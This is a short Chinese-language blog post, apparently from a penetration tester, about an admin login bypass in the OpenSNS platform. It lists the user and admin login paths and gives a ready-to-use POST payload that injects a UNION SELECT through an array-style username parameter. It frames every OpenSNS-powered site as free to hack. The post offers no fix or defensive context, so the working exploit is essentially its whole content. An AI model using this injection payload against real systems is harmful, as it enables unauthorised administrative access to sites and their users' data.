opensns秒进后台

  • A+
所属分类:javasec_cn
摘要

这个是在给客户做渗透测试的时候发现的。期间感谢雨神powered by opensns 随便日

这个是在给客户做渗透测试的时候发现的。期间感谢雨神

powered by opensns 随便日

秒进后台有2处地方:

一个是普通用户登录,一处后台管理登录(默认)

http://a.com/index.php?s=/ucenter/member/login.html 普通用户登录

http://a.com/index.php?s=/admin/public/login.html 后台登录

playload: POST

username[0]==1 UNION SELECT 1,2,'',4,5,6,7,8,9,10,11,12#IN&password= 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: